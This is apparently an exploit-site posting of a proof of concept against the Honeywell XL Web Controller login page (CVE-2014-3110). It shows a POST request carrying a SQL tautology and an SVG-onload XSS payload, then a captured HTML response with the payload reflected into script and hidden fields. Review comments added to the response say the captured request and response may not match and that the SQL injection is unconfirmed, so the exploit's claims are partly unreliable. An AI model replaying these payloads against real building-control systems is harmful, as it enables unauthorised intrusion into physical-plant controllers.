Honeywell XL Web Controller Cross Site Scripting / SQL Injection

Related Vulnerabilities: CVE-2014-3110  
Publish Date: 24 May 2018
Author: t4rkd3vilz
                							

# Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE:  CVE-2014-3110

--------------- ---> Proof Of Concept <--------------------------

POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest

HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT

<br />
<b>Warning</b>:  xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>:  xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
    <meta http-equiv="expires" content="0"/>
    <link rel="stylesheet" href="include/honeywell.css"/>
    <title><br />
<b>Notice</b>:  Undefined index:  HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>
    <script language="JavaScript">
    <!--

      // Legacy Netscape 4 detection (document.layers is undefined in modern browsers);
      // read by checkEnter() below to choose between event.which and event.keyCode.
      var NS4 = document.layers;

  // if the selected element has alarms, the element within the
  // drop Down-list should be styled red.
  // This is done for firefox which does not accept even the
  // usage of inline styles.
  // Mirrors the selected <option>'s "red" class onto the <select> itself.
  // The class is emitted server-side on the option (see the LoginSelect markup below).
  function setOptionColor() {
if(document.getElementById("LoginSelect") != null) {
var selectionBox = document.getElementById("LoginSelect");
var selectedElement = selectionBox.selectedIndex;
var selectedOption = selectionBox.options[selectedElement];
if(selectedOption.getAttribute("class") != null) {
var className = selectedOption.getAttribute("class");
// "red" marks a device with alarms (class="red" on the option in the markup below).
if(className == "red") {
selectionBox.style.color = "#FF0000";
}
}
}

  }

      // Stores the new session/locale ids into the hidden form fields and
      // re-posts the form with command "ChangeSession".
      // NOTE(review): the server reflects the posted LocaleID value back into the
      // hidden LocaleID <input> in the body below without attribute escaping (the
      // captured value closes the attribute), which is one of the XSS sinks this
      // advisory reports. The reflected value in this capture is a scanner marker
      // rather than the 'or'1=1 value in the request above, so request and response
      // may come from different runs. The only SQLi-related evidence in the capture
      // is the xw_get_users() type warning triggered by the non-numeric LocaleID:
      // it shows the value reaches the user lookup unvalidated, but does not by
      // itself confirm injection.
      function onSessionChange (sSessionID, sLocaleID)
      {
        document.forms.main.elements["SessionID"].value = sSessionID;
        document.forms.main.elements["LocaleID"].value = sLocaleID;
        submitCommand ("ChangeSession");
      }

      // Re-posts the form with command "UpdateDeviceList" when the device list changes.
      function onDeviceListChange ()
      {
        submitCommand ("UpdateDeviceList");
      }

      // Callback for the session-creation result.
      //   sResult    - result code as a string; "4194561" is treated as success, and
      //                "196626" is distinguished from every other failure code (the missing
      //                text keys suggest "too many users" vs. "operational problem")
      //   sSessionID - id of the newly created session
      // On failure an alert is shown and nothing is submitted. The alert texts below are
      // mangled in this capture: the server emitted PHP "Undefined index" notices straight
      // into the script source (display_errors enabled, leaking absolute filesystem paths),
      // and the surrounding '*' characters look like list-rendering artifacts rather than
      // original code.
      function onSessionCreated (sResult, sSessionID)
      {
        if (sResult != "4194561")
        {
          if (sResult == "196626")
          {
            alert ("<br />
*<b>Notice</b>:  Undefined index:  CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>346</b><br />*
*\n" +*
                   "\n" +
                   "<br />
*<b>Notice</b>:  Undefined index:  TooManyUsers in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>348</b><br />*
*");*
          }
          else
          {
            alert ("<br />
*<b>Notice</b>:  Undefined index:  CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>352</b><br />*
*\n" +*
                   "\n" +
                   "<br />
*<b>Notice</b>:  Undefined index:  OperationalProblem in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>354</b><br />*
*");*
          }
          return;
        }
        // Client-side credential hashing: MD5(password), then
        // MD5(session + user + MD5(password)), and MD5(user). This is plain MD5 with the
        // session id as the only per-login variation; the hashed values go into the
        // hidden *MD5 fields and are presumably what the server verifies, so they need
        // the same transport protection as a password (the capture appears to be over
        // plain HTTP).
        var sUserName = document.forms.main.elements["LoginUserName"].value;
        var sPassword = calcMD5 (document.forms.main.elements[
"LoginPassword"].value);
        sPassword = calcMD5 (sSessionID + sUserName + sPassword);
        sUserName = calcMD5 (sUserName);
        document.forms.main.elements["LoginSessionID"].value = sSessionID;
        document.forms.main.elements["LoginUserNameMD5"].value = sUserName;
        document.forms.main.elements["LoginPasswordMD5"].value = sPassword;
        submitCommand ("Login");
      }

          // Opens the help page for sHelpID in a dependent window centred on the screen.
          // The "Locale=" part of the URL is filled in server-side; in this capture the
          // injected value closes the string literal and breaks the script, which is the
          // reflected-XSS condition this advisory demonstrates (same sink in changeDevice()).
          // NOTE(review): which request field ends up here cannot be told from the capture
          // alone. The server-side fix is to validate the locale as an integer, or to emit
          // it with proper JS-string encoding, before inserting it into script text.
          function showHelp (sHelpID)
    {
      var lWidth = 360;
      var lHeight = 320;
      var lLeft = (screen.width - lWidth) / 2;
      var lTop = (screen.height - lHeight) / 2;
      openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*
&ID=" + sHelpID,
                     "Help",
                     "width=" + lWidth + ",height=" + lHeight + ",left=" +
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");
    }

      // Sets the hidden LoginCommand field and posts the whole form.
      // The line that would have blanked the LoginPassword field is commented out, so the
      // plaintext password is posted together with the MD5 fields (the captured request
      // body above does carry a LoginPassword parameter).
      function submitCommand (sCommand)
      {
        //document.forms.main.elements["LoginPassword"].value = "";
        document.forms.main.elements["LoginCommand"].value = sCommand;
        document.forms.main.submit ();
      }

      // onKeyDown handler for the password field: Enter (key code 13) starts the login.
      // NS4 (Netscape 4) exposes the key in event.which, other browsers in event.keyCode.
      function checkEnter (event)
      {
       var lkeyCode = 0;
       if (NS4)
        {
       lkeyCode = event.which;
        }
       else
        {
       lkeyCode = event.keyCode;
        }
if (lkeyCode == 13)
        {
       createSession ();

        }

      }

              // Navigates the top-level window to the selected device's login page:
              // http://<option value>:80/standard/default.php?Locale=...
              // The option value comes from the server-rendered device list (see the
              // LoginDevice <select> below). The Locale part is again emitted server-side
              // unescaped; in this capture it carries the injected payload and terminates
              // the string literal early, so the function as served is not valid script.
              // The line break inside elements["LoginDevice"] looks like a wrapping
              // artifact of the capture rather than original code.
              function changeDevice ()
        {
          var oOptions = document.forms.main.elements["
LoginDevice"].options;
          for (var lIndex = 0; lIndex < oOptions.length; lIndex++)
          {
            if (oOptions[lIndex].selected)
            {
              var sURL = "http://" + oOptions[lIndex].value;
                              sURL += ":80";
                            sURL += "/standard/";
              sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>
";
              parent.parent.window.location.replace (sURL);
              return;
            }
          }
        }

      // Starts a login session: delegates to the update frame's createSession() when
      // available, otherwise opens login/session.php in a 0x0 dependent window placed
      // at the bottom-right corner of the screen (effectively invisible). The window
      // handle oWindow is never used afterwards.
      function createSession ()
      {
        if (top.frames.updateframe &&
            top.frames.updateframe.createSession)
        {
top.frames.updateframe.createSession ();

        }
        else
        {
          var lLeft = screen.width;
          var lTop = screen.height;
          var oWindow = open ("login/session.php",
                              "Session",
                              "width=0,height=0,left=" + lLeft + ",top=" +
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");
        }
      }

      // body onLoad handler: points the update frame at login/update.php (if the frame
      // exists) and focuses the LoginUserName field of the main form.
      function onLoad ()
      {
        if (top.frames.updateframe)
        {
          top.frames.updateframe.location.replace ("login/update.php");
        }
        document.main.LoginUserName.focus ();
      }
    //-->
    </script>
    <script type="text/javascript" src="scripts/md5.js"></script>
  </head>

  <body onload="setOptionColor()" class="colored" onLoad="onLoad ();"
style="background-image: url(images/bg_headline_dialog.gif);
background-repeat:repeat-x;">
    <form name="main" method="post" action="/standard/mainframe.php">
      <input type="hidden" name="SessionID"/>
<input type="hidden" name="LocaleID" value="'"--></
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>
              <input type="hidden" name="rememberMeCheck" value=""/>
            <input type="hidden" name="LoginSessionID"/>
      <input type="hidden" name="LoginUserNameMD5"/>
      <input type="hidden" name="LoginPasswordMD5"/>
      <input type="hidden" name="LoginCommand"/>

      <!-- *******************************************************************
-->
      <!-- * Controller Name
 * -->
      <!-- *******************************************************************
-->
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
                  <tr><td bgcolor="#7F7F7F"><img alt=""
src="images/blank.gif" width="1" height="1"/></td></tr>
          <tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"
width="1" height="1"/></td></tr>
                <tr>
          <td class="headline" height="16" nowrap="">
             AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />
<b>Notice</b>:  Undefined index:  Title in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>509</b><br />
          </td>
        </tr>
      </table>

      <table width="100%" height="75%" border="0" cellpadding="0"
cellspacing="0">
        <tr>
          <td width="50%"> </td>
          <td>
            <table border="0" cellspacing="7" cellpadding="0">
                              <!-- ******************************
************************************* -->
                <!-- * Custom image
            * -->
                <!-- ******************************
************************************* -->
                <tr>
                  <td>
                    <table width="100%" border="0" cellpadding="0"
cellspacing="0">
                      <tr>
                        <td align="center">
                          <img alt="" src="login/loginlogo.gif"
                                                              />
                        </td>
                      </tr>
                      <tr><td><img alt="" src="images/blank.gif" width="1"
height="7"/></td></tr>
                    </table>
                  </td>
                </tr>

              <!-- ******************************
************************************* -->
              <!-- * Login group
         * -->
              <!-- ******************************
************************************* -->
                            <tr>
                <td>
                  <br />
<b>Notice</b>:  Undefined index:  Login in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>596</b><br />
<br />
<b>Notice</b>:  Undefined index:  AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>597</b><br />
    <table width="100%" border="0" cellspacing="0" cellpadding="0"
bgcolor="#B8D7F0">
      <tr>
        <td><img alt="" src="images/group_left_top.gif" width="5"
height="5"/></td>
        <td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
        <td align="right"><img alt="" src="images/group_right_top.gif"
width="5" height="5"/></td>
      </tr>
      <tr>
        <td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
        <td width="100%" valign="top">
          <table width="100%" border="0" cellspacing="0" cellpadding="2">
            <tr>
              <td colspan="2" class="groupheader" nowrap="">
                <b></b>
              </td>
              <td align="right">
                                   
                              </td>
            </tr>
            <tr>
              <td> </td>
              <td width="100%">
                        <table border="0" cellpadding="1" cellspacing="1">
                                              <tr>
                          <td nowrap=""><br />
<b>Notice</b>:  Undefined index:  Controller in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>605</b><br />
: </td>
                          <td>

                            <select id="LoginSelect" class="loginSelect"
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">
                                                            <option
selected=""                                      value="192.168.1.12"
                                      class="red" style="color:#FF0000;
background-color:#D8E8F8">
                                            XLWEB_MUSEO_LANA
      </option>
                                                          </select>
                          </td>
                          <td> </td>
                          <td align="right">
                            <img alt="" name="LoginAlarm"
src="footer/alarm_red_tr.gif">                          </td>
                        </tr>
                                            <tr>
                        <td nowrap=""><br />
<b>Notice</b>:  Undefined index:  UserName in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>632</b><br />
: </td>
                        <td>
                          <select name="LoginUserName" style="width:150px;">
                            <br />
<b>Warning</b>:  Invalid argument supplied for foreach() in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>650</b><br />
                          </select>

                           </td>

                      </tr>
                      <tr>
                        <td nowrap=""><br />
<b>Notice</b>:  Undefined index:  Password in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>689</b><br />
: </td>
                        <td>
<!--<input type="password" class="text" name="LoginPassword"
style="width:150px;" onKeyPress="checkEnter (event)"/>-->
 <input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"
size="25" class="ppinput" value=""/>
</td>
                      </tr>
  <tr>
<td><br />
<b>Notice</b>:  Undefined index:  RememberMeCheckbox in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>720</b><br />
</td>
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"
/></td>
  </tr>
                      <tr>
                        <td><img alt="" src="images/blank.gif" width="90"
height="2"/></td>
                        <td><img alt="" src="images/blank.gif" width="1"
height="2"/></td>
                      </tr>
                    </table>
                                </td>
              <td> </td>
            </tr>
          </table>
        </td>
        <td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
      </tr>
      <tr>
        <td><img alt="" src="images/group_left_bottom.gif" width="5"
height="5"/></td>
        <td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
        <td align="right"><img alt="" src="images/group_right_bottom.gif"
width="5" height="5"/></td>
      </tr>
    </table>
                    </td>
              </tr>

              <!-- ******************************
************************************* -->
              <!-- * Button
          * -->
              <!-- ******************************
************************************* -->
              <tr>
                <td>
                  <table border="0" cellspacing="7" cellpadding="0">
                    <tr>
                      <td>
                        <br />
<b>Notice</b>:  Undefined index:  LoginButton in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>750</b><br />
<br />
<b>Notice</b>:  Undefined index:  AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>751</b><br />
    <table border="0" cellspacing="0" cellpadding="0" >
      <tr>
        <td><img alt="" src="images/buttonleft.gif" width="7"
height="18"/></td>
        <td  background="images/buttonmiddle.gif" nowrap=""><a
class="button" href="JavaScript:createSession ();" title=""></a></td>
        <td><img alt="" src="images/buttonright.gif" width="7"
height="18"/></td>
      </tr>
    </table>
                          </td>
                                          </tr>
                  </table>
                </td>
              </tr>
            </table>
          </td>
          <td width="50%"> </td>
        </tr>
      </table>
    </form>
  </body>
</html>